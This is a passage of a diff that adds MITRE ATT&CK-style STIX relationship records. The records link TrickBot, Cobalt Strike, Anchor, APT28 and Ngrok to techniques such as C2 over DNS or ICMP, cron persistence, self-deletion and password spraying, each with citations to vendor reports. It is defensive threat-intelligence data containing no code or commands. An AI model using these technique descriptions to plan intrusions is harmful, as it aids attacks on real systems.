"2020-09-11T13:27:44.344Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--b0bba4a5-a3c3-4cf7-9347-c9070cb18998", + "type": "relationship", + "modified": "2020-10-01T13:39:20.860Z", + "created": "2020-09-11T13:27:44.376Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--7dee0645-9c39-4e04-8012-6ae10a449ae9", + "type": "relationship", + "modified": "2020-09-11T13:27:44.380Z", + "created": "2020-09-11T13:27:44.380Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--bc016a10-a594-495b-8822-ca054050f144", + "type": "relationship", + "modified": "2020-09-11T13:27:44.385Z", + "created": "2020-09-11T13:27:44.385Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--3ed5a1c3-e7c8-4fb7-bfcf-401b29f5f47c", + "type": "relationship", + "modified": "2020-09-11T13:27:44.386Z", + "created": "2020-09-11T13:27:44.386Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the IP addresses of domain controllers.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--6217cb62-db8a-4161-b946-229772bef422", + "type": "relationship", + "modified": "2020-09-11T13:33:17.482Z", + "created": "2020-09-11T13:33:17.482Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--d12b0c1d-ebb2-49b4-bb5c-6f62e058e1e6", + "type": "relationship", + "modified": "2020-09-11T13:33:17.560Z", + "created": "2020-09-11T13:33:17.560Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--f71de781-3899-46ad-9c57-a63f683afab2", + "type": "relationship", + "modified": "2020-10-01T13:33:13.937Z", + "created": "2020-09-11T14:56:37.167Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--116996cd-b855-4730-814d-869fd90e7ce1", + "type": "relationship", + "modified": "2020-09-11T15:22:21.639Z", + "created": "2020-09-11T14:56:37.189Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--f278e83c-f93e-403d-a088-30c4d9d3f984", + "type": "relationship", + "modified": "2020-09-11T14:56:37.193Z", + "created": "2020-09-11T14:56:37.193Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--8bb2744c-3ea2-418b-818d-aaabe0c7746f", + "type": "relationship", + "modified": "2020-09-11T15:22:21.641Z", + "created": "2020-09-11T14:56:37.194Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has obsuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--9297d0b8-3a96-4fb9-90f2-8e3aa9fe4aca", + "type": "relationship", + "modified": "2020-10-01T13:33:14.117Z", + "created": "2020-09-11T14:56:37.196Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--d456bea1-f43c-4934-91fe-54459842f1b2", + "type": "relationship", + "modified": "2020-09-11T15:11:28.365Z", + "created": "2020-09-11T14:56:37.199Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--250638f3-ac26-4aec-adf4-9e705822b621", + "type": "relationship", + "modified": "2020-09-11T14:56:37.214Z", + "created": "2020-09-11T14:56:37.214Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--f3f777de-db0e-4bde-b347-9c5727ef6bb7", + "type": "relationship", + "modified": "2020-09-11T14:56:37.219Z", + "created": "2020-09-11T14:56:37.219Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--1a1e8bdb-bcb5-41ec-a151-c2f5ebc90ab2", + "type": "relationship", + "modified": "2020-09-11T14:56:37.220Z", + "created": "2020-09-11T14:56:37.220Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--077ab82e-3847-4dab-80e2-5dc0ea7d8e9e", + "type": "relationship", + "modified": "2020-09-11T15:11:28.312Z", + "created": "2020-09-11T15:11:28.312Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--736b73d4-a72b-46cc-a9f0-b102d0d0ec48", + "type": "relationship", + "modified": "2020-09-11T15:11:28.315Z", + "created": "2020-09-11T15:11:28.315Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--112012c7-a727-47a4-8a7a-ccb7d40a3311", + "type": "relationship", + "modified": "2020-09-11T15:11:28.317Z", + "created": "2020-09-11T15:11:28.317Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--23c89ec7-3407-4f6d-8b4b-0ab16fbf356c", + "type": "relationship", + "modified": "2020-09-11T15:22:21.555Z", + "created": "2020-09-11T15:22:21.555Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--a73d5874-4aa6-4126-8ae6-af7416b7dc43", + "type": "relationship", + "modified": "2020-09-11T15:22:21.557Z", + "created": "2020-09-11T15:22:21.557Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "external_references": [ + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--36df9345-1175-4425-af6f-e40e393fc182", + "type": "relationship", + "modified": "2020-09-11T15:22:21.559Z", + "created": "2020-09-11T15:22:21.559Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "external_references": [ + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." + } + ], + "description": "[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)", + "relationship_type": "uses", + "id": "relationship--d6958d59-7b54-407c-8bd9-00891c580acc", + "type": "relationship", + "modified": "2020-09-18T21:44:21.976Z", + "created": "2020-09-11T19:53:58.241Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "external_references": [ + { + "source_name": "MalwareBytes Ngrok February 2020", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/", + "description": "Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020." + } + ], + "description": "[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)", + "relationship_type": "uses", + "id": "relationship--ac0538de-47d2-48e9-82c6-64ee5d84c93a", + "type": "relationship", + "modified": "2020-09-15T14:56:31.223Z", + "created": "2020-09-15T14:24:03.089Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "target_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "external_references": [ + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + }, + { + "source_name": "Cyware Ngrok May 2019", + "url": "https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44", + "description": "Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims\u2019 systems. Retrieved September 15, 2020." + }, + { + "source_name": "MalwareBytes Ngrok February 2020", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/", + "description": "Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020." + }, + { + "source_name": "Trend Micro Ngrok September 2020", + "description": "Borja, A. Camba, A. et al (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.", + "url": "https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html" + } + ], + "description": "[Ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)", + "relationship_type": "uses", + "id": "relationship--73c2a491-9da5-465a-be3f-bc5efb0fad6d", + "type": "relationship", + "modified": "2020-09-15T14:56:31.224Z", + "created": "2020-09-15T14:24:03.093Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "external_references": [ + { + "source_name": "MalwareBytes Ngrok February 2020", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/", + "description": "Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020." + }, + { + "source_name": "Zdnet Ngrok September 2018", + "url": "https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/", + "description": "Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020." + } + ], + "description": "[Ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)", + "relationship_type": "uses", + "id": "relationship--e3e323fb-c4c6-4cbd-826e-b472645f378e", + "type": "relationship", + "modified": "2020-09-29T20:46:04.783Z", + "created": "2020-09-15T14:24:03.125Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "external_references": [ + { + "source_name": "Zdnet Ngrok September 2018", + "url": "https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/", + "description": "Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020." + } + ], + "description": "[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)", + "relationship_type": "uses", + "id": "relationship--fb0ab29a-2177-4dac-9311-65c00967ac5d", + "type": "relationship", + "modified": "2020-09-29T20:46:04.799Z", + "created": "2020-09-15T14:56:31.191Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "external_references": [ + { + "source_name": 